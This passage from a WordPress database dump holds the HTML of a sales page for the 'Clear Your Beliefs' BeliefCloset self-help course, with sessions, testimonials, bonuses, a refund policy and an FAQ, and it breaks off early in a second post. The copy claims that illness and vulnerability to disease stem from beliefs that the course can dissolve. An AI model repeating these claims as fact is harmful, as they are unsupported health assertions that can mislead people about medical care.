href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\n\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\n\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\n\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\n\n&nbsp;\n<div class="cb">\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<!-- b2 -->\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<!--[wpfcNOT]-->\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\n<h1>Register Today And You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\n\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\n<ul>\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n</ul>\n&nbsp;\n\n</div>\n&nbsp;\n<div class="cb">\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\n\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\n\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\n\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\n\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\n\n&nbsp;\n<div class="cb">\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\n\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\n\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n<h1 class="center">Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\n\n&nbsp;\n<div class="s20"></div>\n<h1 id="faq">Frequently Asked Questions</h1>\n&nbsp;\n\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n&nbsp;\n\n<strong> Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n&nbsp;\n\n<strong> Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n&nbsp;\n\n<strong> Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n&nbsp;\n\n<strong> Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n&nbsp;\n\n<strong> Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>\njQuery(document).ready(function() { \nvar is_chrome = window.chrome; \n if (is_chrome) { \njQuery(''h5.hdr'').css(''font-'', ''51px/75px ''Arial Narrow'', Arial, sans-serif!important'');\n jQuery(''h5.hdr'').animate({\n    fontSize: ''51px''\n }, 100);\n } \n});\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-autosave-v1', '', '', '2014-06-17 21:57:35', '2014-06-18 02:57:35', '', 915, 'http://clearyourbeliefs.com/915-autosave-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(992, 4194, '2014-06-17 20:59:09', '2014-06-18 01:59:09', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or 